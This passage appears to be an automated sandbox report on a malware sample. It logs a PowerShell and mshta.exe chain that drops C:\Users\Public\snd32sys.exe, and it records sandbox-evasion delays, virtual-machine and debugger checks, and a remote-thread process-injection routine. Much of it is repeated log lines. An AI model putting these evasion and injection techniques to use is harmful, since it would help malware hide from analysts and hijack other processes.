        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1888
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3141
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 673
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1800
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1157
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5964Thread sleep time: -8301034833169293s >= -30000s
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4556Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5908Thread sleep count: 1800 > 30
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5908Thread sleep count: 1157 > 30
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4884Thread sleep count: 43 > 30
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2920Thread sleep time: -11990383647911201s >= -30000s
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5180Thread sleep time: -1844674407370954s >= -30000s
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5276Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Users\Public\snd32sys.exe TID: 4404Thread sleep count: 46 > 30
        Source: C:\Users\Public\snd32sys.exe TID: 4404Thread sleep time: -2760000s >= -30000s
        Source: C:\Users\Public\snd32sys.exe TID: 4404Thread sleep count: 45 > 30
        Source: C:\Users\Public\snd32sys.exe TID: 4404Thread sleep time: -2700000s >= -30000s
        Source: C:\Users\Public\snd32sys.exe TID: 4404Thread sleep time: -60000s >= -30000s
        Source: C:\Users\Public\snd32sys.exeLast function: Thread delayed
        Source: C:\Users\Public\snd32sys.exeLast function: Thread delayed
        Source: C:\Users\Public\snd32sys.exeCode function: 16_2_0065838E FindFirstFileExW,FindNextFileW,FindClose,
        Source: C:\Users\Public\snd32sys.exeCode function: 16_2_00657FD2 FindFirstFileExW,
        Source: C:\Users\Public\snd32sys.exeCode function: 16_2_006133E0 GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Users\Public\snd32sys.exeThread delayed: delay time: 60000
        Source: C:\Users\Public\snd32sys.exeThread delayed: delay time: 60000
        Source: C:\Users\Public\snd32sys.exeThread delayed: delay time: 60000
        Source: powershell.exe, 00000002.00000002.349280205.0000000004E27000.00000004.00000001.sdmp, powershell.exe, 00000006.00000002.334365492.0000000004E33000.00000004.00000001.sdmpBinary or memory string: Hyper-V
        Source: powershell.exe, 00000002.00000002.349280205.0000000004E27000.00000004.00000001.sdmp, powershell.exe, 00000006.00000002.332192660.0000000004A22000.00000004.00000001.sdmpBinary or memory string: j:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
        Source: mshta.exe, 00000001.00000003.224307613.0000000002FDB000.00000004.00000001.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}P
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
        Source: C:\Users\Public\snd32sys.exeCode function: 16_2_00657943 IsDebuggerPresent,
        Source: C:\Users\Public\snd32sys.exeCode function: 16_2_00613560 GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,
        Source: C:\Users\Public\snd32sys.exeCode function: 16_2_0064C285 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\snd32sys.exeCode function: 16_2_00659D43 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\snd32sys.exeCode function: 16_2_00659DC9 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\snd32sys.exeCode function: 16_2_00659D86 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\snd32sys.exeCode function: 16_2_00659E24 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\snd32sys.exeCode function: 16_2_00659ED9 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\snd32sys.exeCode function: 16_2_00659F61 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\snd32sys.exeCode function: 16_2_00659F1D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\snd32sys.exeCode function: 16_2_00659F92 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\snd32sys.exeCode function: 16_2_006B17C3 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\snd32sys.exeCode function: 16_2_006B17C3 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\snd32sys.exeCode function: 16_2_006B138F push dword ptr fs:[00000030h]
        Source: C:\Users\Public\snd32sys.exeCode function: 16_2_00611390 GetProcessHeap,RtlAllocateHeap,
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
        Source: C:\Users\Public\snd32sys.exeCode function: 16_2_0062BAF2 SetUnhandledExceptionFilter,
        Source: C:\Users\Public\snd32sys.exeCode function: 16_2_0062B4CC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
        Source: C:\Users\Public\snd32sys.exeCode function: 16_2_0062B95F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
        Source: C:\Users\Public\snd32sys.exeCode function: 16_2_00636D21 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

        HIPS / PFW / Operating System Protection Evasion:

        barindex
        Contains functionality to inject threads in other processesShow sources
        Source: C:\Users\Public\snd32sys.exeCode function: 16_2_00613860 VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,CloseHandle,VirtualAlloc,CreateThread,CloseHandle,
